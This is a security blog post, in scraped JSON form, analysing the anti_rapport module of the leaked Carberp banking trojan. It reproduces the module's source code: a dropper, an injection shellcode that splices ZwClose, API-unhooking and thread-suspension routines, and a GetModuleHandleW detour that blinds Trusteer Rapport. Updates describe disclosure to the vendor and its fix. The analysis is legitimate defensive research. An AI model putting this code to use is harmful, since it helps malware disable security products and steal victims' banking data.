One of the multiple modules of Carberp is called anti_rapport<\/span><\/strong>, this is a module able to (in theory) inject itself in Internet Explorer”s memory<\/strong> to remove Trusteer rapport protection by unhooking API calls <\/strong>and suspend rapport”s threads<\/strong>. I will also forbid any thread related to rapport dll to get a handle on any module of the process.<\/strong><\/p>\n\n\n\n Here”s the global flow of the source code: The module is divided in 2 parts<\/strong>. The dropper (exe file) and the DLL. Both parts belong to the same file, but they are related to different parts in the flow.<\/p>\n\n\n\n Entry code:<\/p>\n\n\n\n The dropper is responsible for copying itself to a temp file<\/strong>, then modify that copy to turns its characteristic flag into DLL<\/strong>. That way, it can be injected as module into processes. Once the DLL is ready, it reads iexplore.exe memory<\/strong> (Mapping) and copies a shellcode right after the Section headers of its loaded ntdll.dll module<\/strong>.<\/p>\n\n\n\n The Shellcode is basically only a LoadLibrary<\/strong>, which will trigger the Main routine of the injected DLL into the process”s context. Shellcode:<\/p>\n\n\n\n Once the shellcode copied into loaded module, the dropper will rewrite the first few bytes of ZwClose (in ntdll) to jump to the shellcode (Splice)<\/strong>. So at any attempt to ZwClose (which occurs quite often) from iexplore.exe, the DLL will be loaded in memory and trigger the main routine<\/strong> (in process”s context).<\/p>\n\n\n\n Dll injected into iexplore.exe: The DLL is responsible (once injected) for removing every hook made by a protection DLL<\/strong>, stop any thread from “rapport” DLL<\/strong>, and forbid “rapport” DLL to call GetModuleHandleW<\/strong> in kernel32.dll<\/p>\n\n\n\n To remove protection made by a security product into Internet Explorer, the anti_rapport will look for hooks in specific modules<\/strong> (ntdll.dll, kernel32.dll, mswsock.dll, ws2_32.dll, wsock32.dll, wininet.dll, user32.dll and gdi32.dll<\/em>), and remove them<\/strong>.<\/p>\n\n\n\n To perform hook removal, the DLL will simply reload the DLL into another memory space<\/strong>, parse Export tables<\/strong> (one for the new loaded DLL and one for the existing one) and compare addresses<\/strong>. If some of them mismatches, it will restore to initial value.<\/strong><\/p>\n\n\n\n To stop rapport threads, the module only enumerate process”s threads<\/strong>, then call NtQueryInformationThread<\/a> with ThreadQuerySetWin32StartAddress value to get the threads”s entry point address, then it calls GetMappedFileName<\/a> to get the module name related to the thread”s entry point.<\/p>\n\n\n\n That way it”s able to retrieve the module where a thread is based<\/strong>. To finish, it filters that name and calls ResumeThread only on those who are authorized to run<\/strong> (It has previously suspended the whole process with NtSuspendProcess)<\/p>\n\n\n\n To avoid Security products to access any part of the process<\/strong>, and be able to check for malicious hooks, the anti_rapport will detour GetModuleHandle<\/a> API and filter any attempt to access a loaded module<\/strong>.<\/p>\n\n\n\n The hook is made with classic splicing<\/strong>, which consists to insert a JUMP at the beginning of the function (in memory). It”s way better than IAT hook (which replace the address of the function in IAT table) because not visible except if we scan lot of the process”s memory.<\/p>\n\n\n\n Here, the hook is not seen in TaskSTRun<\/strong> (But I know it’s here \ud83d\ude42 ): By loading the infected process into a debugger<\/strong>, and looking at the address (0x7C80E4DD) of the function (in ntdll), we can see the detour code: That jump leads to the detour function<\/strong>, which looks like this: It”s just getting the caller of the function and the caller of that caller<\/strong> (with RtlGetCallersAddress), and checks if one of them is coming from any “rapport” DLL<\/strong>. If this is the case, the function will return NULL<\/strong> (and thus will forbid that caller to get the needed handle), otherwise it returns the original function<\/strong>.<\/p>\n\n\n\n By doing this, a security product that needs to get a handle<\/strong> on a module to scan it (for signatures, or to check the IAT table) will be rejected and will not be able to scan it<\/strong>.<\/p>\n\n\n\n Do not forget that module is part of a huge malware, Carberp<\/strong>. This malware is able to steal bank informations by watching the web browser<\/strong>. One major problem for them was to go stealth and remain into that web browser, even with security products guarding it.<\/p>\n\n\n\n That module has clearly being developed to kill Trusteer rapport product<\/strong>, and keep their product functional and undetected.<\/p>\n\n\n\n Trusteer claims their product has resisted to this<\/a>, so that”s a good point \ud83d\ude42 . However, even if the anti_rapport code contains hard-coded name about the rapport module of Trusteer, it”s quite generic and can be adapted for any security product<\/strong> that use wide DLL injection to guard web browsers.<\/p>\n\n\n\n UPDATE 07\/22\/2013<\/strong><\/p>\n\n\n\n I’ve tested the module against Rapport, and it seems to be bypassed<\/strong>. I don’t know if it really protects or not, but every feature of the anti-rapport module has been loaded and is functional. I was able to inject the DLL into iexplore.exe<\/strong> (with rapport loaded), to hook GetModuleHandleW<\/strong>, and to filter DLL calls<\/strong>. Trusteer has been contacted, I hope they will either give me more information or fix this. This is severe issue, as this malware is in the wild for years, and now because the source code has been leaked and will be used in many new malwares. See screenshots below. UPDATE 07\/25\/2013<\/strong><\/p>\n\n\n\n Trusteer, after a fast reply told me they had fixed it. So I updated their software, and retried start the anti-rapport binary.<\/p>\n\n\n\n Now, the module is able to inject itself in Internet Explorer, and splice the API, but it seems unable to resume some useful threads, related to core application. As a consequence, Internet Explorer behaves like it was hanging, and does not responds anymore. This is really better, for several reasons.<\/p>\n\n\n\n I would like to thanks Trusteer for their quick answer and fix, and for their valuable support guys.<\/p>\n","protected":false},"excerpt":{"rendered":" Carberp Anti Rapport Trusteer – How the Carberp malware is defeating Anti Rapport (from Trusteer) to gain access to the bank account of a victim.<\/p>\n","protected":false},"author":1,"featured_media":43,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[36],"tags":[7,42,8,39,38],"class_list":["post-33","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-analysis","tag-analysis","tag-carberp","tag-malware","tag-rapport","tag-trusteer","category-36","description-off"],"views":717,"yoast_score":71,"yoast_readable":30,"featured_image_src":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/anti_rapport-parallax.png","author_info":{"display_name":"tigzy","author_link":"https:\/\/www.adlice.com\/de\/author\/tigzy\/"},"yoast_head":"\n
Analysis<\/h4>\n\n\n\n
![\"anti_rapport-1024x966\"](\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/anti_rapport-1024x966.png\")
<\/a><\/p>\n\n\n\nBOOL Entry(HMODULE hDll, DWORD dwReasonForCall, DWORD dwReserved)\n{\n BOOL bRet = FALSE;\n CHAR chExePath[MAX_PATH];\n\n GetModuleFileName(NULL, chExePath, RTL_NUMBER_OF(chExePath)-1);\n\n \/\/ Dll call -- Injector\n if (hDll && dwReasonForCall == DLL_PROCESS_ATTACH)\n {\n g_bDll = TRUE;\n\n UtiDPrint(__FUNCTION__\"(): Dll: %x\\\\n\", hDll);\n\n HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MainThread, NULL, 0, NULL);\n if (hThread) CloseHandle(hThread);\n\n bRet = TRUE;\n }\n \/\/ Exe call -- Dropper\n else if (!g_bDll)\n {\n DbgPrint(__FUNCTION__\"(): Exe: ''%s''\\\\n\", chExePath);\n\n DropperExeWork(chExePath);\n\n ExitProcess(ERROR_SUCCESS);\n }\n\n return bRet;\n}<\/code><\/pre>\n\n\n\n
Dropper<\/h4>\n\n\n\n
<\/a><\/p>\n\n\n\n\/\/ ShellCode\n__declspec(naked) VOID injn_dllloader_start()\n{\n __asm\n {\n mov eax,0x11111111 \/\/pShellData->bLock (stored in process) in EAX\n xor cl,cl \/\/clear CL flag\n cmp byte ptr [eax], cl \/\/if bLock = 0 => Exit\n jz exit_\n mov byte ptr [eax], cl \/\/Set bLock = cl = 0\n inc eax \/\/move EAX ptr on pShellData->chDllName\n push eax \/\/pShellData->chDllName on stack\n mov eax, 0x22222222 \/\/LoadLibraryA addr in EAX\n call eax \/\/Call LoadLibrary\nexit_:\n mov eax, 0x33333333 \/\/pShellData->ucOldBytes (stored in process) in EAX\n jmp eax \/\/Jump to stolen bytes (old address of splicing)\n }\n}\n\n__declspec(naked) VOID injn_dllloader_end(){__asm __emit ''J''}\n\n#define injn_dllloader_size (DWORD)injn_dllloader_end-(DWORD)injn_dllloader_start<\/code><\/pre>\n\n\n\n
<\/a><\/p>\n\n\n\n
DLL<\/h4>\n\n\n\n\n
VOID UnhookLibs()\n{\n UnhookModuleExports(MyGetModuleBase(\"ntdll\"));\n UnhookModuleExports(MyGetModuleBase(\"kernel32\"));\n UnhookModuleExports(MyGetModuleBase(\"mswsock\"));\n UnhookModuleExports(MyGetModuleBase(\"ws2_32\"));\n UnhookModuleExports(MyGetModuleBase(\"wsock32\"));\n UnhookModuleExports(MyGetModuleBase(\"wininet\"));\n if (!GetModuleHandle(\"ieframe.dll\")) UnhookModuleExports(MyGetModuleBase(\"user32.dll\"));\n UnhookModuleExports(MyGetModuleBase(\"gdi32.dll\"));\n}<\/code><\/pre>\n\n\n\n\n
BOOL AntiRapControlThreads(HANDLE hProcess, DWORD dwPid)\n{\n HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);\n if (hSnap == INVALID_HANDLE_VALUE) return FALSE;\n\n HANDLE hThread;\n THREADENTRY32 thread = {0};\n thread.dwSize = sizeof(THREADENTRY32);\n\n if (Thread32First(hSnap, &thread))\n {\n do \n {\n if (thread.th32OwnerProcessID == dwPid && thread.th32ThreadID != GetCurrentThreadId())\n {\n if (hThread = OpenThread(THREAD_SUSPEND_RESUME|THREAD_QUERY_INFORMATION, 0, thread.th32ThreadID))\n {\n CHAR chFileName[MAX_PATH];\n PVOID pvStartAddress;\n DWORD dwLen;\n\n if (NT_SUCCESS(NtQueryInformationThread(hThread, ThreadQuerySetWin32StartAddress, &pvStartAddress, sizeof(PVOID), &dwLen)))\n {\n if (GetMappedFileName(hProcess, pvStartAddress, chFileName, RTL_NUMBER_OF(chFileName)-1))\n {\n if (!StrStrI(chFileName, \"rapport\"))\n {\n ResumeThread(hThread);\n }\n }\n }\n\n CloseHandle(hThread);\n }\n }\n } \n while (Thread32Next(hSnap, &thread));\n }\n\n CloseHandle(hSnap);\n\n return TRUE;\n}<\/code><\/pre>\n\n\n\n\n
<\/a><\/p>\n\n\n\n
<\/p>\n\n\n\n<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\n
<\/a><\/p>\n\n\n\nHMODULE WINAPI NewGetModuleHandleW(LPWSTR lpModuleName)\n{\n PVOID pvCallersAddress;\n PVOID pvCallersCaller;\n\n RtlGetCallersAddress(&pvCallersAddress, &pvCallersCaller);\n\n BOOL bPass = AntiRapCheckAddress(pvCallersAddress) || AntiRapCheckAddress(pvCallersCaller);\n\n if (bPass) return g_OldGetModuleHandleW(lpModuleName); else return NULL;\n}\n\nBOOL AntiRapCheckAddress(PVOID pvAddress)\n{\n PLDR_DATA_TABLE_ENTRY pLdrEntry;\n\n if (NT_SUCCESS(LdrFindEntryForAddress(pvAddress, &pLdrEntry)))\n {\n if (StrStrIW(pLdrEntry->BaseDllName.Buffer, L\"rapport\"))\n {\n return FALSE;\n }\n }\n\n return TRUE;\n}<\/code><\/pre>\n\n\n\n
Conclusion<\/h4>\n\n\n\n
<\/p>\n\n\n\n<\/a><\/a>\n